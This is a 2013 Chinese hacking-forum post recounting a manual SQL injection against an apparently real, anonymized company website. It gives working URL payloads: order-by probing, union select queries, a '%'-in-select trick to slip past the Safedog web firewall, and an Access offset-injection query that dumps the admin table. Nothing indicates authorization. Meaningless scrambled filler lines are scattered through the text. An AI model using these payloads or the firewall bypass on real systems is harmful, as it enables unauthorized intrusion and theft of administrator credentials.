中国网络渗透测试联盟
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
[打印本页]
作者:
admin
时间:
2013-3-8 21:49
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。
7 l+ j# Z$ l# C' T/ _( X& B
+ o3 J+ l8 e% |, T1 ^9 v$ D
+ E z: a9 ^: W
顺手加个admin
7 v4 h$ ?3 v$ a6 u. q; h% L
! e: I! v; Y! c% V% ^
2 \6 U# ?8 J0 z# c% E4 V
默认后台。
2 Y0 t( ~6 X6 o8 V5 O
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
w) |4 I' ~# B
2 T {0 u$ W+ b" a) @+ ]
2 U5 u$ A1 g! d( y# u# ] Y( W
% t- O; d5 b% ?* ^3 F( h' G
所以就不用御剑扫了,待会直接封IP。
9 `2 f6 m* t! e! P- _% B
# a7 v& W2 R, n
用order by语句判断是否存在注入。
3 b/ s8 ^/ G b, X1 U5 e
http://www.xxx.com
/product_show.asp?id=997 order by 1
$ {5 f! q$ |) L- q
http://www.xxx.com
/product_show.asp?id=997 order by 100
) p' q) I2 ?7 L; P* p! ^
现在存在注入,经测试后发现是9个字段。
% |& ]5 ~4 I3 M9 V) ~8 w, P8 n
" g$ Q; G: `2 {5 Q. K) @
接下来进行联合查询,猜是否存在admin表。
6 T9 N. s8 T7 C5 U6 l9 _/ n
http://www.xxx.com
/product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
( G. d* p; f( f( V: R
4 X! e; D4 s7 g9 n
. p. O% t( n, F( V
; r# T/ x; k' _" ]- z
在select中间加个%,se%lect绕过安全狗。
4 j* Q6 b+ K, M, T0 i' C3 ]
7 f; U" \ b/ ]4 r: K/ _
4 c% P `! s9 n/ M, W" z! k, l8 l2 m
发现存在admin表,然后开始手工猜常用的字段。
1 L# u% V: L* i
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
, I/ b# \1 G1 r6 Z
: e% c2 _" E, x
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
( m! h( \8 i& m
9 P9 l! ~6 F/ _$ X- ?/ V" U- M
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
1 i( e' m- \" j
http://www.xxx.com
/product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
2 ?7 ~- Z/ |; V/ X4 |
好了,敏感内容出显了。
4 @1 c) v) u8 h! c5 @
; C. Y% ?0 b. Z; S4 b& |* I. q! o
, x6 \6 V( s& Q6 s' e
% S/ g) b1 H% k9 b: m+ ]6 d
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2